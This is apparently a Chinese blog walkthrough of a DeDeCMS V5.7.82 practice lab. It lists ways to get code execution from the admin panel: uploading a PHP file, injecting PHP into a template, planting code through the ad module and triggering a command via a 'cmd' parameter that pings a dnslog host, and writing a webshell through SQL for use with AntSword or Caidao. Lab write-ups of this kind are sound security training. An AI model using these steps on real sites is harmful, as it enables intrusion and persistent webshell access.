DeDeCMS靶场攻略

故事与他6452025-03-21 15:36

文件管理器

点击模块,选择上传文件

在电脑中新建2.php

<?php phpinfo();?>

访问2.php,验证是否成功

修改模板文件

在模块中找到index.htm

在index.htm加上<?php phpinfo();?>

点击生成->更新主页HTML,将index.html改为index.php

访问index.php,验证是否成功

后台任意命令执行

点击广告管理->增加广告

<?php phpinfo();?>

点击[代码]

得到地址

访问地址,无回显

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1

在dnslog.cn上获得一个网址

再次访问,这样若成功将木马植入的话dnslog会显示访问记录

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1&cmd=ping%20cs8vcw.dnslog.cn

后台sql命令执行

尝试查询basedir

在得到的目录下写入木马文件

访问后得到12.php

这些成功后可以用蚁剑,caidao连接

相关推荐
Libraeking5 分钟前
视觉篇:Canvas 自定义绘图与高级动画的华丽圆舞曲
android·经验分享·android jetpack
Fushize34 分钟前
多模块架构下的依赖治理:如何避免 Gradle 依赖地狱
android·架构·kotlin
Jomurphys1 小时前
Kotlin - 类型别名 typealias
android·kotlin
Haha_bj1 小时前
Flutter ——flutter_screenutil 屏幕适配
android·ios
Haha_bj2 小时前
Flutter ——device_info_plus详解
android·flutter·ios
前端小伙计2 小时前
Android/Flutter 项目统一构建配置最佳实践
android·flutter
Mr_sun.3 小时前
Day09——入退管理-入住-2
android·java·开发语言
ujainu4 小时前
告别杂乱!Flutter + OpenHarmony 鸿蒙记事本的标签与分类管理(三)
android·flutter·openharmony
常利兵5 小时前
Android内存泄漏:成因剖析与高效排查实战指南
android
·云扬·5 小时前
MySQL 8.0 Redo Log 归档与禁用实战指南
android·数据库·mysql
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03openclaw配置教程(linux+局域网ollama)04UV安装并设置国内源05AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南06Linux下V2Ray安装配置指南07openclaw使用nginx反代部署过程 与disconnected (1008): pairing required解决08在Trae中使用Pencil MCP09Claude Code Skills 实用使用手册10Vue-skills的中文文档